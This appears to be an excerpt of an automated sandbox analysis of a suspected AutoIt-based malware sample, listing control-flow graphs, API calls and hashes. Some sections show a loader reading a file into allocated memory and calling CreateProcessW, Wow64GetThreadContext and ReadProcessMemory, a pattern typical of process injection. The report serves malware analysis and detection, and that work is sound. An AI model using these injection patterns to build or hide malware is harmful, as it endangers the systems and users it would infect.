                                                  • Part of subcall function 00512CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00512D6F
                                                  • Part of subcall function 00512CD4: LoadIconW.USER32(000000A9), ref: 00512D85
                                                  • Part of subcall function 00512CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00512D94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 423443420-4155596026
                                                • Opcode ID: c8c7ba3d9ffbf7dad13689c7b0c4d9a9b61d5d69ee38b5dec210e6b8c6c1a51e
                                                • Instruction ID: ab420cb404ae0d20ee839d5fdab40278d11b92ac88542dcbe3edf1425b223d21
                                                • Opcode Fuzzy Hash: c8c7ba3d9ffbf7dad13689c7b0c4d9a9b61d5d69ee38b5dec210e6b8c6c1a51e
                                                • Instruction Fuzzy Hash: 90216A70E00358AFDB149FA5EC89AAD7FF4FB1CB50F00041AE580AA7A0D3B10548EF88

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 551 513170-513185 552 5131e5-5131e7 551->552 553 513187-51318a 551->553 552->553 554 5131e9 552->554 555 5131eb 553->555 556 51318c-513193 553->556 559 5131d0-5131d8 DefWindowProcW 554->559 560 5131f1-5131f6 555->560 561 552dfb-552e23 call 5118e2 call 52e499 555->561 557 513265-51326d PostQuitMessage 556->557 558 513199-51319e 556->558 566 513219-51321b 557->566 563 5131a4-5131a8 558->563 564 552e7c-552e90 call 57bf30 558->564 565 5131de-5131e4 559->565 567 5131f8-5131fb 560->567 568 51321d-513244 SetTimer RegisterWindowMessageW 560->568 594 552e28-552e2f 561->594 570 552e68-552e72 call 57c161 563->570 571 5131ae-5131b3 563->571 564->566 588 552e96 564->588 566->565 574 513201-513214 KillTimer call 5130f2 call 513c50 567->574 575 552d9c-552d9f 567->575 568->566 572 513246-513251 CreatePopupMenu 568->572 584 552e77 570->584 578 552e4d-552e54 571->578 579 5131b9-5131be 571->579 572->566 574->566 581 552dd7-552df6 MoveWindow 575->581 582 552da1-552da5 575->582 578->559 591 552e5a-552e63 call 570ad7 578->591 586 513253-513263 call 51326f 579->586 587 5131c4-5131ca 579->587 581->566 589 552da7-552daa 582->589 590 552dc6-552dd2 SetFocus 582->590 584->566 586->566 587->559 587->594 588->559 589->587 595 552db0-552dc1 call 5118e2 589->595 590->566 591->559 594->559 599 552e35-552e48 call 5130f2 call 513837 594->599 595->566 599->559
                                                APIs
                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0051316A,?,?), ref: 005131D8
                                                • KillTimer.USER32(?,00000001,?,?,?,?,?,0051316A,?,?), ref: 00513204
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00513227
                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0051316A,?,?), ref: 00513232
                                                • CreatePopupMenu.USER32 ref: 00513246
                                                • PostQuitMessage.USER32(00000000), ref: 00513267
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                • String ID: TaskbarCreated
                                                • API String ID: 129472671-2362178303
                                                • Opcode ID: 1e4f2c516c0a5113d87074a3038e763419e0f9377f5e5955fbf77d5990e95207
                                                • Instruction ID: 2ab847bb1c256f8f2e4315ca530101497210aa3205ea15995f18b23dfea5c71b
                                                • Opcode Fuzzy Hash: 1e4f2c516c0a5113d87074a3038e763419e0f9377f5e5955fbf77d5990e95207
                                                • Instruction Fuzzy Hash: E7414939240644B7FB186B78DC7DBFD3E59F756340F04052AF9528A1A1CB708AC8E7A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: D%^$D%^$D%^$D%^$D%^D%^$Variable must be of type 'Object'.
                                                • API String ID: 0-438337734
                                                • Opcode ID: b73e8a981823ac3e5ab98131003153fcbd07f0ae4d15a0561cc02c23900b1f11
                                                • Instruction ID: 323d3e8f8dbce0a03a566d9cec9c41876ebecf7366e5eac5a79410ab5342d786
                                                • Opcode Fuzzy Hash: b73e8a981823ac3e5ab98131003153fcbd07f0ae4d15a0561cc02c23900b1f11
                                                • Instruction Fuzzy Hash: B4C2BF71A00215CFEB24CF58D886AADBBB1FF59310F248969ED56AB391D370ED81CB50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1117 1603050-16030fe call 1600a80 1120 1603105-160312b call 1603f60 CreateFileW 1117->1120 1123 1603132-1603142 1120->1123 1124 160312d 1120->1124 1129 1603144 1123->1129 1130 1603149-1603163 VirtualAlloc 1123->1130 1125 160327d-1603281 1124->1125 1126 16032c3-16032c6 1125->1126 1127 1603283-1603287 1125->1127 1131 16032c9-16032d0 1126->1131 1132 1603293-1603297 1127->1132 1133 1603289-160328c 1127->1133 1129->1125 1134 1603165 1130->1134 1135 160316a-1603181 ReadFile 1130->1135 1136 16032d2-16032dd 1131->1136 1137 1603325-160333a 1131->1137 1138 16032a7-16032ab 1132->1138 1139 1603299-16032a3 1132->1139 1133->1132 1134->1125 1142 1603183 1135->1142 1143 1603188-16031c8 VirtualAlloc 1135->1143 1144 16032e1-16032ed 1136->1144 1145 16032df 1136->1145 1146 160334a-1603352 1137->1146 1147 160333c-1603347 VirtualFree 1137->1147 1140 16032bb 1138->1140 1141 16032ad-16032b7 1138->1141 1139->1138 1140->1126 1141->1140 1142->1125 1148 16031ca 1143->1148 1149 16031cf-16031ea call 16041b0 1143->1149 1150 1603301-160330d 1144->1150 1151 16032ef-16032ff 1144->1151 1145->1137 1147->1146 1148->1125 1157 16031f5-16031ff 1149->1157 1154 160331a-1603320 1150->1154 1155 160330f-1603318 1150->1155 1153 1603323 1151->1153 1153->1131 1154->1153 1155->1153 1158 1603201-1603230 call 16041b0 1157->1158 1159 1603232-1603246 call 1603fc0 1157->1159 1158->1157 1164 1603248 1159->1164 1165 160324a-160324e 1159->1165 1164->1125 1167 1603250-1603254 CloseHandle 1165->1167 1168 160325a-160325e 1165->1168 1167->1168 1169 1603260-160326b VirtualFree 1168->1169 1170 160326e-1603277 1168->1170 1169->1170 1170->1120 1170->1125
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01603121
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01603347
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087758926.0000000001600000.00000040.00000020.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1600000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CreateFileFreeVirtual
                                                • String ID:
                                                • API String ID: 204039940-0
                                                • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                • Instruction ID: e375c4ebad231ab9862f4d497d801bd8f960759f2df405cf38e52dfed4ebcb59
                                                • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                • Instruction Fuzzy Hash: 95A1F874E00209EFDB19CFA4C994BAEBBB5BF48306F208559E601BB3C1D7759A41CB94

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1181 512c63-512cd3 CreateWindowExW * 2 ShowWindow * 2
                                                APIs
                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00512C91
                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00512CB2
                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00511CAD,?), ref: 00512CC6
                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00511CAD,?), ref: 00512CCF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: 89165a7c98567d1cc41c631086db311e900b2983ca30c5ee3e8e3083fefe8e11
                                                • Instruction ID: b78191da6a19a4070b5bd1660b6506e9f4f27e897899a2873503c4c8845f81f5
                                                • Opcode Fuzzy Hash: 89165a7c98567d1cc41c631086db311e900b2983ca30c5ee3e8e3083fefe8e11
                                                • Instruction Fuzzy Hash: 1FF03A755402D07EEB300713AC88E773EBDE7EBF50B00045EF940AA5A0C6711848EAB8

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1296 1602e30-1602f4c call 1600a80 call 1602d20 CreateFileW 1303 1602f53-1602f63 1296->1303 1304 1602f4e 1296->1304 1307 1602f65 1303->1307 1308 1602f6a-1602f84 VirtualAlloc 1303->1308 1305 1603003-1603008 1304->1305 1307->1305 1309 1602f86 1308->1309 1310 1602f88-1602f9f ReadFile 1308->1310 1309->1305 1311 1602fa1 1310->1311 1312 1602fa3-1602fdd call 1602d60 call 1601d20 1310->1312 1311->1305 1317 1602ff9-1603001 ExitProcess 1312->1317 1318 1602fdf-1602ff4 call 1602db0 1312->1318 1317->1305 1318->1317
                                                APIs
                                                  • Part of subcall function 01602D20: Sleep.KERNELBASE(000001F4), ref: 01602D31
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01602F42
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087758926.0000000001600000.00000040.00000020.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1600000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CreateFileSleep
                                                • String ID: YPS0PMUE59SM6XX98SC
                                                • API String ID: 2694422964-747375993
                                                • Opcode ID: 27a900c224153b7df6cbe6dcf47292ffa1986938470c38a81735931869e405a9
                                                • Instruction ID: 881bb00102ab2f31a2f1724860860f38d3644f75e6f89f56587497d84a1abf9b
                                                • Opcode Fuzzy Hash: 27a900c224153b7df6cbe6dcf47292ffa1986938470c38a81735931869e405a9
                                                • Instruction Fuzzy Hash: 82515D31D04249DAEB16DBA4CC18BEFBB79AF15301F004199E619BB2C1D6B50B49CBA5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1320 582947-5829b9 call 551f50 call 5825d6 call 52fe0b call 515722 call 58274e call 51511f call 535232 1335 582a6c-582a73 call 582e66 1320->1335 1336 5829bf-5829c6 call 582e66 1320->1336 1341 582a7c 1335->1341 1342 582a75-582a77 1335->1342 1336->1342 1343 5829cc-582a6a call 53d583 call 534983 call 539038 call 53d583 call 539038 * 2 1336->1343 1346 582a7f-582b3a call 5150f5 * 8 call 583017 call 53e5eb 1341->1346 1344 582cb6-582cb7 1342->1344 1343->1346 1347 582cd5-582cdb 1344->1347 1385 582b3c-582b3e 1346->1385 1386 582b43-582b5e call 582792 1346->1386 1350 582cdd-582ced call 52fdcd call 52fe14 1347->1350 1351 582cf0-582cf6 1347->1351 1350->1351 1385->1344 1389 582bf0-582bfc call 53e678 1386->1389 1390 582b64-582b6c 1386->1390 1397 582bfe-582c0d DeleteFileW 1389->1397 1398 582c12-582c16 1389->1398 1391 582b6e-582b72 1390->1391 1392 582b74 1390->1392 1394 582b79-582b97 call 5150f5 1391->1394 1392->1394 1404 582b99-582b9e 1394->1404 1405 582bc1-582bd7 call 58211d call 53dbb3 1394->1405 1397->1344 1400 582c18-582c7e call 5825d6 call 53d2eb * 2 call 5822ce 1398->1400 1401 582c91-582ca5 CopyFileW 1398->1401 1402 582cb9-582ccf DeleteFileW call 582fd8 1400->1402 1425 582c80-582c8f DeleteFileW 1400->1425 1401->1402 1403 582ca7-582cb4 DeleteFileW 1401->1403 1411 582cd4 1402->1411 1403->1344 1408 582ba1-582bb4 call 5828d2 1404->1408 1420 582bdc-582be7 1405->1420 1418 582bb6-582bbf 1408->1418 1411->1347 1418->1405 1420->1390 1421 582bed 1420->1421 1421->1389 1425->1344
                                                APIs
                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00582C05
                                                • DeleteFileW.KERNEL32(?), ref: 00582C87
                                                • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00582C9D
                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00582CAE
                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00582CC0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: File$Delete$Copy
                                                • String ID:
                                                • API String ID: 3226157194-0
                                                • Opcode ID: 0b3bda7bcd7fa98b3cca3caeb28c7b726303a62aa60eda0791c99cb9cef91687
                                                • Instruction ID: d8a466fde6715d192c1b25391eab9c62b1a2b36353e92d2b34031b6139532f0e
                                                • Opcode Fuzzy Hash: 0b3bda7bcd7fa98b3cca3caeb28c7b726303a62aa60eda0791c99cb9cef91687
                                                • Instruction Fuzzy Hash: 99B1417190111AABDF15EBA4CC89EEE7FBDFF89350F1040A6F909F6141EA319A448F61

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1426 545aa9-545ace 1427 545ad7-545ad9 1426->1427 1428 545ad0-545ad2 1426->1428 1430 545afa-545b1f 1427->1430 1431 545adb-545af5 call 53f2c6 call 53f2d9 call 5427ec 1427->1431 1429 545ca5-545cb4 call 530a8c 1428->1429 1432 545b26-545b2c 1430->1432 1433 545b21-545b24 1430->1433 1431->1429 1437 545b2e-545b46 call 53f2c6 call 53f2d9 call 5427ec 1432->1437 1438 545b4b 1432->1438 1433->1432 1436 545b4e-545b53 1433->1436 1442 545b64-545b6d call 54564e 1436->1442 1443 545b55-545b61 call 549424 1436->1443 1475 545c9c-545c9f 1437->1475 1438->1436 1453 545b6f-545b71 1442->1453 1454 545ba8-545bba 1442->1454 1443->1442 1457 545b95-545b9e call 54542e 1453->1457 1458 545b73-545b78 1453->1458 1460 545c02-545c23 WriteFile 1454->1460 1461 545bbc-545bc2 1454->1461 1474 545ba3-545ba6 1457->1474 1462 545c6c-545c7e 1458->1462 1463 545b7e-545b8b call 5455e1 1458->1463 1466 545c25-545c2b GetLastError 1460->1466 1467 545c2e 1460->1467 1468 545bc4-545bc7 1461->1468 1469 545bf2-545c00 call 5456c4 1461->1469 1472 545c80-545c83 1462->1472 1473 545c89-545c99 call 53f2d9 call 53f2c6 1462->1473 1484 545b8e-545b90 1463->1484 1466->1467 1476 545c31-545c3c 1467->1476 1477 545be2-545bf0 call 545891 1468->1477 1478 545bc9-545bcc 1468->1478 1469->1474 1472->1473 1482 545c85-545c87 1472->1482 1473->1475 1474->1484 1488 545ca4 1475->1488 1485 545ca1 1476->1485 1486 545c3e-545c43 1476->1486 1477->1474 1478->1462 1487 545bd2-545be0 call 5457a3 1478->1487 1482->1488 1484->1476 1485->1488 1491 545c45-545c4a 1486->1491 1492 545c69 1486->1492 1487->1474 1488->1429 1496 545c60-545c67 call 53f2a3 1491->1496 1497 545c4c-545c5e call 53f2d9 call 53f2c6 1491->1497 1492->1462 1496->1475 1497->1475
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: JOQ
                                                • API String ID: 0-3921798060
                                                • Opcode ID: 406b47cefafd532f179173fe4036eb942f9cb2223270f1b6d72f8732076f18dd
                                                • Instruction ID: 6a2e05dfffb8997bfcb0bbf0ecc67ba69fdb86b8c7cd3d9f2bc7bf9880926ced
                                                • Opcode Fuzzy Hash: 406b47cefafd532f179173fe4036eb942f9cb2223270f1b6d72f8732076f18dd
                                                • Instruction Fuzzy Hash: CE51BE75D0060A9BCB259FA4CC89FEEBFB8FF45318F14045AF405A7292E6319D01DB61
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00513B0F,SwapMouseButtons,00000004,?), ref: 00513B40
                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00513B0F,SwapMouseButtons,00000004,?), ref: 00513B61
                                                • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00513B0F,SwapMouseButtons,00000004,?), ref: 00513B83
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 3677997916-824357125
                                                • Opcode ID: 319631d09ed959d626de6772052e70475460ae4af12e77f925a05db88f3ffe56
                                                • Instruction ID: 09d53879e9682ef28836425b54e2f20288d6eab53c977c5ae174cfe8191ab0fe
                                                • Opcode Fuzzy Hash: 319631d09ed959d626de6772052e70475460ae4af12e77f925a05db88f3ffe56
                                                • Instruction Fuzzy Hash: 35112AB5514208FFEB208FA5DC58AEFBBB8FF05744B104859A805D7110E2319E84A760
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 016024DB
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01602571
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01602593
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087758926.0000000001600000.00000040.00000020.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1600000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                • Opcode ID: 99ff7f62c7c0315fa1339eff959a02870827681df0665961f4f58c830292e5bf
                                                • Instruction ID: 8d86dd18d7d378bcf28d15803fc2f25b1d60aa339e1ed62b7cd0799fd39bb675
                                                • Opcode Fuzzy Hash: 99ff7f62c7c0315fa1339eff959a02870827681df0665961f4f58c830292e5bf
                                                • Instruction Fuzzy Hash: C5620B34A142189BEB29CBA4CC54BDEB772EF58300F1091A9D10DEB3D0E7769E85CB59
                                                APIs
                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 005533A2
                                                  • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00513A04
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: IconLoadNotifyShell_String_wcslen
                                                • String ID: Line:
                                                • API String ID: 2289894680-1585850449
                                                • Opcode ID: 05eea6fcb1ada2521fcb5a0d5e221eaf53a1451a317741dcebe2744874c77966
                                                • Instruction ID: 37012539bff7429e0e1a0e8109a5fc8a43f79459d6da61c8ef5df5daa4e78fbd
                                                • Opcode Fuzzy Hash: 05eea6fcb1ada2521fcb5a0d5e221eaf53a1451a317741dcebe2744874c77966
                                                • Instruction Fuzzy Hash: 2431E271408301AAE325EB20DC59BEBBFD8BF94710F100D2AF59993091EB709688C7C6
                                                APIs
                                                • GetOpenFileNameW.COMDLG32(?), ref: 00552C8C
                                                  • Part of subcall function 00513AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00513A97,?,?,00512E7F,?,?,?,00000000), ref: 00513AC2
                                                  • Part of subcall function 00512DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00512DC4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Name$Path$FileFullLongOpen
                                                • String ID: X$`e]
                                                • API String ID: 779396738-2761306869
                                                • Opcode ID: 233d51a63626955e37975bd671959e772abcd52637bf02909dccb5e526c68677
                                                • Instruction ID: 6c7f1b1fc690e06ec670124cc7bb6c773e2ca169bf0c90e93474dc7d2e786c83
                                                • Opcode Fuzzy Hash: 233d51a63626955e37975bd671959e772abcd52637bf02909dccb5e526c68677
                                                • Instruction Fuzzy Hash: 64218171A002589BDB41DF98D849BEE7FF8BF89305F00405AE405A7241DBB45A898F61
                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00530668
                                                  • Part of subcall function 005332A4: RaiseException.KERNEL32(?,?,?,0053068A,?,005E1444,?,?,?,?,?,?,0053068A,00511129,005D8738,00511129), ref: 00533304
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00530685
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Exception@8Throw$ExceptionRaise
                                                • String ID: Unknown exception
                                                • API String ID: 3476068407-410509341
                                                • Opcode ID: c71999923d2a1515696546d23750eedc3b54cedce785c4248cf2589d742347fa
                                                • Instruction ID: 330f89fbd2b33b6d71b1ab31fef8c90d072caeb2ce816210f737f1f86866d3d9
                                                • Opcode Fuzzy Hash: c71999923d2a1515696546d23750eedc3b54cedce785c4248cf2589d742347fa
                                                • Instruction Fuzzy Hash: DEF0C23490030E77CF00B6A8E85AC9E7F7CBE81310F604532B824D65D5EF71EA65CA80
                                                APIs
                                                • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0058302F
                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00583044
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
